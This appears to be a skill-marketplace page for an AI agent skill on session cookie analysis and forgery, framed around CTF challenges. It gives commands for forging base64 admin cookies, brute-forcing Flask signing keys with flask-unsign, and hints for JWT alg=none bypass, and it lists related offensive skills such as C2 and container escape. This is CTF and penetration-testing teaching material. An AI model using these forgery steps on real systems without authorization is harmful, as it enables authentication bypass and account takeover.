wgpsec/cookie-analysis
skills/exploit/auth/cookie-analysis/SKILL.md
Session cookie 分析与伪造方法论。当发现 Web 应用使用 cookie 进行认证、需要判断 cookie 类型并选择伪造方法时使用。覆盖 unsigned base64 cookie 直接伪造、Flask 签名 cookie(flask-unsign 爆破密钥)、加密/二进制 cookie 的识别。本技能负责 cookie 类型判断和分流:如果判断为 JWT(三段式 eyJ 开头),应转至 jwt-attack-methodology;如果判断为加密 cookie 需要 Padding Oracle,应转至 crypto-web-attack
$ install --global
skillsauthnpx skillsauth add wgpsec/AboutSecurity cookie-analysisInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: Apr 23, 2026, 2:17 AM56.6s1 file scanned
SKILL.md
- name:
- cookie-analysis
- description:
- Session cookie 分析与伪造方法论。当发现 Web 应用使用 cookie 进行认证、需要判断 cookie 类型并选择伪造方法时使用。覆盖 unsigned base64 cookie 直接伪造、Flask 签名 cookie(flask-unsign 爆破密钥)、加密/二进制 cookie 的识别。本技能负责 cookie 类型判断和分流:如果判断为 JWT(三段式 eyJ 开头),应转至 jwt-attack-methodology;如果判断为加密 cookie 需要 Padding Oracle,应转至 crypto-web-attack
- tags:
- cookie,session,flask,base64,forgery,authentication,bypass,cookie-analysis,认证绕过,flask-unsign,session cookie,itsdangerous,cookie伪造,unsigned cookie
- category:
- exploit
Cookie Analysis & Forgery Methodology
When to Use
- You found a session cookie and want to forge it
- BEFORE running flask-unsign or any brute-force tool
- When you need to bypass authentication via cookie manipulation
Step 1: Extract the cookie
curl -sI http://TARGET/ | grep -i set-cookie
Step 2: Identify cookie type
Test A: Base64 decode
echo '<cookie_value>' | base64 -d 2>/dev/null
# Also try URL-decoded version:
python3 -c "import base64,urllib.parse; print(base64.b64decode(urllib.parse.unquote('<cookie>')))"
If it decodes to valid JSON → UNSIGNED BASE64 (most common in CTF!)
- Attack: forge directly — takes 5 seconds
# Forge admin session
echo -n '{"user_id":1}' | base64
# Use as cookie:
curl -b 'session=eyJ1c2VyX2lkIjoxfQ==' http://TARGET/admin/flag
- Try variations:
echo -n '{"user_id":1}' | base64
echo -n '{"role":"admin"}' | base64
echo -n '{"is_admin":true}' | base64
echo -n '{"user_id":1,"role":"admin"}' | base64
echo -n '{"username":"admin"}' | base64
Test B: Flask itsdangerous signature
If the cookie has a . followed by a signature portion:
# Cookie looks like: eyJ...IjoxfQ.Xk2Ypg.dBV2_DkvOBP3...
flask-unsign --decode --cookie '<cookie>'
# If decode works → Flask signed cookie
flask-unsign --unsign --cookie '<cookie>' --wordlist $ABOUTSECURITY_ROOT/Dic/passwords.txt
Test C: JWT
If the cookie has three base64 parts separated by .:
# Header.Payload.Signature
echo '<first_part>' | base64 -d # Should show {"alg":"...","typ":"JWT"}
# → Use Skill(skill="jwt-attack-methodology")
Test D: Encrypted/Binary
If base64 decode produces garbage → encrypted cookie
- Need key or padding oracle attack
- Check source code for encryption key
Step 3: Common bypass patterns
- If unsigned: forge with user_id=1, role=admin, is_admin=true
- If Flask-signed: try common keys ('secret', app name, etc.)
- If JWT with alg=none: remove signature, set alg to "none"
- If JWT with HS256: try common secrets, check for JWKS endpoint
Critical Reminders
- NEVER run flask-unsign on unsigned cookies — wastes 25+ minutes and ALWAYS fails
- Always decode the cookie FIRST to determine its type
- Base64 JSON cookies are the most common type in CTF challenges
- Direct forgery takes 5 seconds vs brute-forcing takes 25+ minutes
Related Skills
wgpsec/azure-pentesting
testing
VerifiedTrustedCommunity
Azure 云环境渗透测试总体方法论。当目标使用 Azure/Microsoft 365/Entra ID、发现 Azure 相关资产(Blob Storage/App Service/Azure VM/Azure Functions)、获取 Azure 凭据(Service Principal/Managed Identity/Access Token)、或需要对 Azure 环境进行安全评估时使用。提供从未授权枚举到 Entra ID 攻击、服务提权、Cloud-to-OnPrem 横向移动的全流程决策树。覆盖 35+ Azure 服务攻击面
1,393SKILL.mdUpdated Apr 24, 2026
wgpsec/mythic-c2
tools
VerifiedTrustedCommunity
Mythic C2 操作方法论。当需要部署 Mythic、选择 Mythic Agent、安装 C2 Profile、配置 HTTP/DNS/WebSocket/SMB/TCP 通信、生成 payload、管理回连任务,或把 Mythic 作为跨平台 C2 框架用于授权红队演练时使用。覆盖 mythic-cli 安装、Agent/Profile 选择、SSL 证书配置、payload 构建和基础 OPSEC 判断
1,345SKILL.mdUpdated May 22, 2026
wgpsec/docker-pentesting
development
VerifiedTrustedCommunity
Docker 安全测试与容器渗透方法论。当需要评估 Docker 容器、Docker Daemon、Docker Registry、镜像层、构建产物或容器逃逸风险时使用。覆盖容器环境识别、特权容器逃逸、docker.sock/Remote API 利用、procfs/cgroup/capabilities 滥用、Docker 用户组提权、运行时/内核 CVE、Registry 枚举、镜像层 Secret 分析和构建上下文泄露。发现 Docker 容器环境、Registry 暴露、镜像凭据或容器配置错误时应使用此技能
1,345SKILL.mdUpdated May 22, 2026
wgpsec/padbuster-padding-oracle
development
VerifiedTrustedCommunity
使用 PadBuster 进行 Padding Oracle 攻击。当发现 Web 应用使用 CBC 模式加密且存在 Padding Oracle 漏洞时使用。PadBuster 可自动解密密文和伪造任意明文对应的合法密文,适用于加密 Cookie/Token/URL 参数。任何涉及 Padding Oracle 攻击、CBC 密文解密、Cookie 伪造的场景都应使用此技能
1,345SKILL.mdUpdated May 6, 2026